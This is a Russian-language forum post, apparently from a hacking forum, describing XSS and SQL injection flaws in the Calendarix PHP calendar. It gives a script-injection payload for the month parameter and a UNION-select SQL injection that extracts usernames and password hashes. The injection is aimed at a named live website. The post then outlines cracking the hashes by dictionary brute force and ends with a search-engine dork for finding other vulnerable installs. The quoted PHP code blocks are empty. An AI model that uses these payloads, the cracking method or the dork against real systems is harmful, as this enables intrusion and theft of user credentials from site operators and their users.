![]() |
XSS и SQL-injection в Calendarix.
Уязвимости подвержены многие версии, от версии к версии разнится только структура SQL запроса.
1. XSS Пассивные XSS существует во многих параметрах, например, в $month : calendar.php?month="><script>alert(/XSS/)</script> Пример уязвимого кода в calendar.php PHP код:
Уязвимость существует из-за плохой фильтрации значений переменной $catview (значение переменной должно быть ненулевым!!!) PHP код:
Пример: http://www.3ringcircusproductions.com/calendar/calendar.php POST: catview=2+and+(0=1)+union+select+11,22,concat(user name,char(58),password),4,5+from+calendar_users-- P. S. Префикс таблицы по умолчанию calendar_ Кол-во колонок в запросе меняется от версии к версии. Пароли пользователей шифруются по следющему алгоритму: PHP код:
PHP код:
На сколько я знаю, PassWord Pro может работать с солью. Если же я ошибаюсь, то можно написать маленький php-брутфорсер, читающий файл словаря, криптующий по этому же алгоритму каждую строчку и сравнивающую с существующим хешем. Только стоит ли... ) dork: inurl:yearcal.php intitle:Calendar |
| Время: 21:26 |